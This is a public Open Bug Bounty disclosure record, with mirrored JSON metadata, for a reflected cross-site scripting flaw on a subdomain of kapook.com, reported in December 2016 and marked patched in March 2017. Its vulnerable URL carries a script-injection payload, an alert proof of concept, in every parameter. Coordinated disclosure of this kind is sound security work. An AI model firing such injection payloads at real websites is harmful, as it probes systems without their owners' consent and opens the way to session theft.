nongbualamphu.kapook.com. XSS vulnerability

2016-12-30T10:08:00

Description

##### Vulnerable URL: http://nongbualamphu.kapook.com./?place_id=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputPictureFile;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputType;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&latlng;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentType;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef2d1b19eb19fbe11000031;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef2d25c9eb19f193d000008;[]=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputDescription;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef90bac9eb19fb61100001a;[]=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef2d0289eb19f025600001c;=xss%22%3E%20%3C/form%3E%3Csc ##### Details: Description| Value ---|--- Patched:| Yes, at 24.03.2017 Latest check for patch:| 24.03.2017 08:08 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website status:| No Check nongbualamphu.kapook.com. SSL connection:| (Grade: B-) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 30 December, 2016 10:08 GMT Generic security notifications sent to website owner| 30 December, 2016 10:12 GMT Vulnerability details disclosed by researcher| 6 January, 2017 10:16 GMT Vulnerability patched by the website owner| 25 March, 2017 01:25 GMT

{"type": "openbugbounty", "lastseen": "2017-10-17T01:58:22", "href": "https://www.openbugbounty.org/reports/201366/", "cvss": {"score": 0.0, "vector": "NONE"}, "reporter": "XSSbot", "description": "##### Vulnerable URL:\n \n \n http://nongbualamphu.kapook.com./?place_id=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputPictureFile;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputType;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&latlng;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentType;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef2d1b19eb19fbe11000031;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef2d25c9eb19f193d000008;[]=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputDescription;=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef90bac9eb19fb61100001a;[]=xss%22%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&inputIncidentValue4ef2d0289eb19f025600001c;=xss%22%3E%20%3C/form%3E%3Csc\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at 24.03.2017 \nLatest check for patch:| 24.03.2017 08:08 GMT \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| Unknown / Not calculated \nVIP website status:| No \nCheck nongbualamphu.kapook.com. SSL connection:| (Grade: B-) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 30 December, 2016 10:08 GMT \nGeneric security notifications sent to website owner| 30 December, 2016 10:12 GMT \nVulnerability details disclosed by researcher| 6 January, 2017 10:16 GMT \nVulnerability patched by the website owner| 25 March, 2017 01:25 GMT\n", "bulletinFamily": "bugbounty", "references": [], "viewCount": 2, "cvelist": [], "openbugbounty": {"mirror": "", "patchStatus": "patched"}, "enchantments_done": [], "title": "nongbualamphu.kapook.com. XSS vulnerability ", "id": "OBB:201366", "modified": "2017-03-25T01:25:00", "published": "2016-12-30T10:08:00", "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645350664}}